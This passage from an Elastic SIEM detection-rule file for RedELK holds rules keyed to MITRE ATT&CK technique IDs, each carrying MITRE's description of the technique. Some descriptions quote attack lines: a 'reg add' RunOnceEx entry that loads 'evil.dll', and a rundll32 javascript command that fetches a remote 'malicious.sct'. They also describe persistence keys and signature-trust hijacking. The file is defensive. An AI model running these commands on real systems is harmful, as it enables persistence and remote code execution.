Access","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1108","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1108] Redundant Access","query":"threat.technique.id: T1108","references":["https://attack.mitre.org/techniques/T1108","https://attack.mitre.org/techniques/T1136"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1108","name":"Redundant Access","id":"T1108"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1108","name":"Redundant Access","id":"T1108"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. [1] These programs will be executed under the context of the user and will have the account's associated permissions level.\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\nThe following run keys are created by default on Windows systems: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. [2] For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" [3]\nThe following Registry keys can be used to set startup folder items for persistence: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\nThe following Registry keys can control automatic startup of services during boot: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys: HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1060","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1060] Registry Run Keys / Startup Folder","query":"threat.technique.id: T1060","references":["https://attack.mitre.org/techniques/T1060","https://attack.mitre.org/techniques/T1547/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1060","name":"Registry Run Keys / Startup Folder","id":"T1060"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. [1] [2]\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. [3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1121","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1121] Regsvcs/Regasm","query":"threat.technique.id: T1121","references":["https://attack.mitre.org/techniques/T1121","https://attack.mitre.org/techniques/T1218/009"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1121","name":"Regsvcs/Regasm","id":"T1121"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1121","name":"Regsvcs/Regasm","id":"T1121"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. [1]\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. [2] This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. [3] [4]\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1117","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1117] Regsvr32","query":"threat.technique.id: T1117","references":["https://attack.mitre.org/techniques/T1117","https://attack.mitre.org/techniques/T1218/010"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1117","name":"Regsvr32","id":"T1117"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1117","name":"Regsvr32","id":"T1117"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. [1]\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. [2] [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1219","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1219] Remote Access Tools","query":"threat.technique.id: T1219","references":["https://attack.mitre.org/techniques/T1219"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1219","name":"Remote Access Tools","id":"T1219"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).[1]\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1076","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1076] Remote Desktop Protocol","query":"threat.technique.id: T1076","references":["https://attack.mitre.org/techniques/T1076","https://attack.mitre.org/techniques/T1021/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1076","name":"Remote Desktop Protocol","id":"T1076"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1105","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1105] Remote File Copy","query":"threat.technique.id: T1105","references":["https://attack.mitre.org/techniques/T1105"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1105","name":"Remote File Copy","id":"T1105"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1105","name":"Remote File Copy","id":"T1105"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1021","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1021] Remote Services","query":"threat.technique.id: T1021","references":["https://attack.mitre.org/techniques/T1021"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1021","name":"Remote Services","id":"T1021"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or net view using Net. Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.\nSpecific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.\nWithin IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.[1][2] Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.[3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1018","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1018] Remote System Discovery","query":"threat.technique.id: T1018","references":["https://attack.mitre.org/techniques/T1018"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1018","name":"Remote System Discovery","id":"T1018"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1091","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1091] Replication Through Removable Media","query":"threat.technique.id: T1091","references":["https://attack.mitre.org/techniques/T1091"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1091","name":"Replication Through Removable Media","id":"T1091"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1091","name":"Replication Through Removable Media","id":"T1091"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability.\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.[1] Servers and cloud-based[2] systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1496","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1496] Resource Hijacking","query":"threat.technique.id: T1496","references":["https://attack.mitre.org/techniques/T1496"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1496","name":"Resource Hijacking","id":"T1496"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1536","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1536] Revert Cloud Instance","query":"threat.technique.id: T1536","references":["https://attack.mitre.org/techniques/T1536","https://attack.mitre.org/techniques/T1578/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1536","name":"Revert Cloud Instance","id":"T1536"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. [1]\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. [2] Rootkits have been seen for Windows, Linux, and Mac OS X systems. [3] [4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1014","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1014] Rootkit","query":"threat.technique.id: T1014","references":["https://attack.mitre.org/techniques/T1014"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1014","name":"Rootkit","id":"T1014"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.\nRundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [1]\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1085","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1085] Rundll32","query":"threat.technique.id: T1085","references":["https://attack.mitre.org/techniques/T1085","https://attack.mitre.org/techniques/T1218/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1085","name":"Rundll32","id":"T1085"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1085","name":"Rundll32","id":"T1085"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.[1][2] By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1494","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1494] Runtime Data Manipulation","query":"threat.technique.id: T1494","references":["https://attack.mitre.org/techniques/T1494","https://attack.mitre.org/techniques/T1565/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1494","name":"Runtime Data Manipulation","id":"T1494"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. [1] An account can hold additional SIDs in the SID-History Active Directory attribute [2], allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values [3] may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, Windows Admin Shares, or Windows Remote Management.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1178","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1178] SID-History Injection","query":"threat.technique.id: T1178","references":["https://attack.mitre.org/techniques/T1178","https://attack.mitre.org/techniques/T1134/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1178","name":"SID-History Injection","id":"T1178"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode [1] digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, [2] which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. [3]\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) [4] to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all [5]) and are identified by globally unique identifiers (GUIDs). [3]\nSimilar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: [3]\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{{SIP_GUID}} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP [6] (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{{SIP_GUID}} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP [6] (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\nModifying the DLL and Function Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{{trust provider GUID}} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\nNote: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1198","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1198] SIP and Trust Provider Hijacking","query":"threat.technique.id: T1198","references":["https://attack.mitre.org/techniques/T1198","https://attack.mitre.org/techniques/T1553/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1198","name":"SIP and Trust Provider Hijacking","id":"T1198"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1198","name":"SIP and Trust Provider Hijacking","id":"T1198"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.[1]\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1053","language":"kuery","license":"BSD 